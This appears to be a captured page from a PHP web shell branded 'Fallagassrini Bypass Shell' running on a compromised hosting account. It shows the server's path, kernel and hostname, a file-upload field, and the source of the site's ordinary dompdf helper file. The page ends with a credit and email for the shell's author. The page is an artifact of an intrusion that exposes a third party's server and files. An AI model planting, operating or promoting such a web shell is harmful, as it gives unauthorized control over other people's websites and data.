? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/oscardraft/application/helpers/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/oscardraft/application/helpers/to_pdf_helper.php

<?php if (!defined('BASEPATH')) exit('No direct script access allowed');
function pdf_create($html, $filename,$landscape="",$stream=TRUE)
{
 require_once("dompdf/dompdf_config.inc.php");
$filename = $filename.".pdf";
$dompdf = new DOMPDF();
$dompdf->load_html($html);
if($landscape=='true')
{
$dompdf->set_paper("a4", "landscape" );
}
$dompdf->render();
if ($stream) {
        $dompdf->stream($filename);
    } else {
        return $dompdf->output();
    }


   
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net